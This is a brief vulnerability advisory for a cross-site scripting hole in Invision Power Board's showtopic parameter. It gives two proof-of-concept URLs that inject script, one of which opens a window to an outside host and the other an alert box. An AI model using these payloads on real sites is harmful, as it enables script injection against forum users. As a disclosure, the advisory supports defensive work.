Invision Power Board Index.php Showtopic Cross-Site Scripting Vulnerability

Invision Power Board Index.php Showtopic Cross-Site Scripting Vulnerability

The following proof of concept was provided:

http://www.example.com/index.php?showtopic='><script>window.open
(window.location.search.substring(79))
</script>http://binaryvision.tech.nu?BoyBear$$$From$$$BinaryVision
http://www.example.com/?showtopic='><script>alert(window.document.url)</script><plaintext>